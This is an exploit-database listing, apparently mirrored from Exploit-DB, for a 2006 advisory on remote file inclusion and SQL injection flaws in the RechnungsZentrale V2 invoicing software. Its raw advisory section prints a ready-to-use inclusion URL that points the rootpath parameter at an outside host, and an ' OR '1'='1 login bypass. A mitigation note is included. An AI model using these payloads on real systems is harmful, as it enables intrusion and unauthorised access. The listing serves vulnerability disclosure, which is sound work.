header-logo
Suggest Exploit
vendor:
RechnungsZentrale V2
by:
GroundZero Security Research and Software Development
7,5
CVSS
HIGH
Remote Inclusion and SQL Injection
89, 564
CWE
Product Name: RechnungsZentrale V2
Affected Version From: 1.1.3
Affected Version To: Older versions
Patch Exists: Yes
Related CWE: N/A
CPE: a:nfec:rechnungszentrale_v2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Remote Inclusion and SQL Injection Vulnerabilities in RechnungsZentrale V2

RechnungsZentrale V2 version 1.1.3 and likely older versions are vulnerable to Remote Inclusion and SQL Injection. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable server with the rootpath parameter set to a malicious URL. Additionally, an attacker can use a specially crafted username and password to bypass authentication and gain access to the system.

Mitigation:

Users should upgrade to the latest version of RechnungsZentrale V2. Additionally, users should ensure that all input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

- GroundZero Security Research and Software Development 2006                     -

   Software:   RechnungsZentrale V2
   Version:    1.1.3, likely older versions are affected aswell.
   Vendor:     http://www.nfec.de/
   
   Remote Inclusion:
       http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
   
   SQL Injection:
       User: ' OR '1'='1
       Password: 1   
   
- Bugs discovered by GroundZero Security Research and Software Development       -
- http://www.GroundZero-Security.com | Http://www.g-0.org                        -

# milw0rm.com [2006-04-19]

Navigation

Suggest Exploit

Services By CQR